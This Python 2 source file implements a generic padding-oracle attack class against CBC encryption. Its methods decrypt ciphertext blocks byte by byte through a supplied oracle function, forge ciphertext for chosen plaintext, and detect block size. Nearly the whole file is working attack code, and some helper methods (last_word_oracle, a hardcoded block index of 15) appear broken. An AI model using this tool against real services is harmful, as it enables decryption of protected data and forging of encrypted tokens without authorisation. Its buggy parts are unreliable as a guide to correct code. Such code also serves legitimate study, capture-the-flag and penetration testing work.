#!/usr/bin/python from base64 import b64encode, b64decode from copy import deepcopy import logging import random from functools import reduce import sys class Encoding: ''' Encoding Enum ''' b64 = 1 b64_web = 2 hex = 3 raw = 5 class PaddingOracle(object): ''' Generic code to attack padding oracles ''' def __init__(self, ciphertext, BS=None, verbosity=1, encoding=Encoding.b64, oracle=None): # setup logging - default self.set_verbosity(verbosity) # init class variables self.encoding = encoding self.oracle_func = oracle self.analyse_func = None # encode the initial ciphertext self.ct = self.decode(ciphertext) # if no BS is give, determine the BS if BS == None: self.BS = self.get_blocksize(self.ct) else: self.BS = BS self.num_blocks = self._ct_init() self.blocks = self.split_blocks(self.ct) self._outmode = "hex" # backup it_blocks and pt_blocks as dict {index:block} - for changing blocks self.it_blocks = {} self.pt_blocks = {} ''' Used to decode the ciphertext, using the class variable self.encoding, internally the ciphertext is processed as string (bytes) ''' def decode(self, ciphertext): if self.encoding == Encoding.b64: ciphertext = b64decode(ciphertext) elif self.encoding == Encoding.hex: ciphertext = ciphertext.decode('hex') elif self.encoding == Encoding.b64_web: ciphertext = b64decode(ciphertext) #TODO: adjust to b64web_decoding return ciphertext ''' Used to encode the ciphertext, using the class variable self.encoding, internally the ciphertext is processed as string (bytes) but returned in the same fashion as the input was ''' def encode(self, ciphertext): if self.encoding == Encoding.b64: ciphertext = b64encode(ciphertext) elif self.encoding == Encoding.hex: ciphertext = ciphertext.encode('hex') elif self.encoding == Encoding.b64_web: ciphertext = b64encode(ciphertext) #TODO: adjust to b64web_decoding return ciphertext ''' simple length checks and blockcount ''' def _ct_init(self): if len(self.ct) % self.BS != 0: raise Exception("[-] Length not a multiple of the BS") return len(self.ct) / self.BS ''' splits the ciphertext in bs-large blocks ''' def split_blocks(self, ct): return [bytearray(ct[i:i+self.BS]) for i in range(0, len(ct), self.BS)] ''' merges the blocks together and return ciphertext ''' def merge_blocks(self, blocks): out = bytearray() for ba in blocks: out.extend(ba) return out def last_word_oracle(self, y): r = [chr(random.randint(0x00, 0xff)) for i in range(self.BS)] r_b = r[-1] for i in range(256): r[-1] = chr(ord(r_b) ^ i) y = ''.join(r) # ask the oracle if self.oracle_func(r + y): # padding is 0x01 r_b = r_b ^ i # for n = b down to 2 for n in range(self.BS, 1, -1): r = r[self.BS-n] * r[self.BS-2] ''' bool oracle(ct) - should return True if ct is correct and False if padding error ''' def crack_last_block(self, blocks): orig_blocks = deepcopy(blocks) # deepcopy for not referencing lists... pt_block = [0]*self.BS # plaintext block it_block = [0]*self.BS # intermidiate block orig_pre_ct = orig_blocks[-2] # only assigning the lists will reference to the original blocks-list!! pre_ct = blocks[-2] # second to last ct block - gets modified last_ct = blocks[-1] # last ct block real_padding = self.BS first_run = True # byte_index is counting backwards in the second-to-last block for byte_index in range(self.BS-1, -1, -1): padding = self.BS - byte_index # gets jumped over during the first run if byte_index < 15: for prev_byte_index in range(15, byte_index, -1): #print("[-] Adjusting byte @ offset %d [Padding: %x]" % (prev_byte_index, padding)) pre_ct[prev_byte_index] = it_block[prev_byte_index] ^ padding for guess in range(256): # iterate the bytes @ byte_index position pre_ct[byte_index] = guess # ask the oracle #if oracle(merge_blocks(blocks)) and orig_pre_ct[byte_index] != guess: if self.oracle_func == None: raise Exception("[-] No Oracle function set!") if self.oracle_func(self.merge_blocks(blocks)): if guess == orig_pre_ct[byte_index] and padding < real_padding: continue pt_block[byte_index] = guess ^ padding ^ orig_pre_ct[byte_index] if first_run: real_padding = pt_block[byte_index] first_run = False it_block[byte_index] = guess ^ padding logging.debug("[~] correct padding [{0}] with byte [{1}]\n\t-> it_byte = {0} ^ {1} = {3}\n\t-> pt_byte = it_byte ^ {2} = {4}\n".format(hex(padding),\ hex(guess), hex(orig_pre_ct[byte_index]), hex(it_block[byte_index]),hex(pt_block[byte_index]))) logging.debug("[+] Plaintext Block: {}".format(pt_block)) break return it_block, pt_block ''' used to print the ct blocks as hexdump ''' def print_ct_blocks(self): print("[~] ciphertext as blockwise hexdump") ch_arr = self.bytes_to_string(reduce(lambda x, y: x+y, [list(ba) for ba in self.blocks])) print(self.hexdump(ch_arr, length=self.BS)) ''' convert a byte-list to a string ''' def bytes_to_string(self, inp): return "".join([chr(p) for p in inp]) ''' change block @ index to a new block ''' def change_block(self, new_plaintext): if len(new_plaintext) % self.BS != 0: raise Exception("[-] new plaintext should be a multiple of the blocksize") # Startin at Block 2 (index 1) new_blocks = self.split_blocks(new_plaintext) num_new_blocks = len(new_blocks) local_blocks = deepcopy(self.blocks) local_it_blocks = deepcopy(self.it_blocks) if num_new_blocks > len(local_blocks): raise Exception("[-] Plaintext is too long") for idx in range(num_new_blocks-1, 0, -1): logging.info("[*] changing index %d" % idx) it_block = self.get_it_block(idx, local_blocks) local_blocks[idx-1] = ''.join(map(lambda xy: chr(xy[0]^xy[1]), zip(new_blocks[idx], it_block))) x = self.merge_blocks(local_blocks) # adjust all the previous blocks (iv block_0 = IV, the complete message can be changed) return self.encode(x) ''' used to crack the block @ index index := {0, 1, .., .., len-1} ''' def get_it_block(self, index, ct_blocks): if not index: raise Exception("[-] Cannot decrypt the first block") local_blocks = deepcopy(ct_blocks) it_block, pt_block = self.crack_last_block(local_blocks[:index+1]) return it_block ''' used to crack the block @ index index := {0, 1, .., .., len-1} ''' def crack_block(self, index): if not index: raise Exception("[-] Cannot decrypt the first block") local_blocks = deepcopy(self.blocks) it_block, pt_block = self.crack_last_block(local_blocks[:index+1]) self.it_blocks[index] = it_block self.pt_blocks[index] = pt_block logging.info("\n[+] decrypted block [%d]\n" %(index)) self._output(pt_block) ''' universal func. to output plaintext ''' def _output(self, pt_block): print("-----[ Plaintext ]-----") if self._outmode == "hex": print(self.hexdump(self.bytes_to_string(pt_block))) elif self._outmode == "str": print(self.bytes_to_string(pt_block)) ''' set the output mode for printing the plaintext ''' def set_output(self, mode): self._outmode = mode ''' verbosity for different output 0 = no output 1 = INFO 2 = DEBUG ''' def set_verbosity(self, level): levels = { 0:logging.WARNING, 1:logging.INFO, 2:logging.DEBUG } logging.basicConfig(format='%(message)s', level=levels.get(level, logging.INFO)) def decrypt_block_at_index(self, index): logging.info("[+] Decrypting block at index %d" % index) self.crack_block(index) ''' crack all blocks of the ciphertext (except first one) ''' def decrypt_all_blocks(self): orig_blocks = deepcopy(self.blocks) local_blocks = deepcopy(self.blocks) num_blocks = len(self.blocks) pt_blocks = [] logging.info("[+] Decrypting all %d blocks" % num_blocks) for idx in range(num_blocks, 1, -1): logging.info("[*] Decrypting block %d" %(idx)) it_block, pt_block = self.crack_last_block(local_blocks[:idx]) pt_blocks.append(pt_block) local_blocks = deepcopy(orig_blocks) self.it_blocks[idx-1] = it_block self.pt_blocks[idx-1] = pt_block pt_blocks = pt_blocks[::-1] pt = reduce(lambda x, y: x+y, pt_blocks) logging.info("\n[+] decrypted all the blocks\n") self._output(pt) ''' get the blocksize via the oracle - described in 'Practical Padding Oracle Attacks', by T. Duong & J. Rizzo Works like following: ''' def get_blocksize(self, ciphertext): if self.oracle_func == None: raise Exception('Error: Not oracle set!') if len(ciphertext) % 16 == 8: return 8 c = ciphertext[-16:] if self.oracle_func(ciphertext + c) == True: return 8 return 16 def hexdump(self, src, length=16): ''' https://gist.github.com/sbz/1080258 ''' src = str(src) FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)]) lines = [] for c in range(0, len(src), length): chars = src[c:c+length] hex = ' '.join(["%02x" % ord(x) for x in chars]) printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars]) lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable)) return ''.join(lines)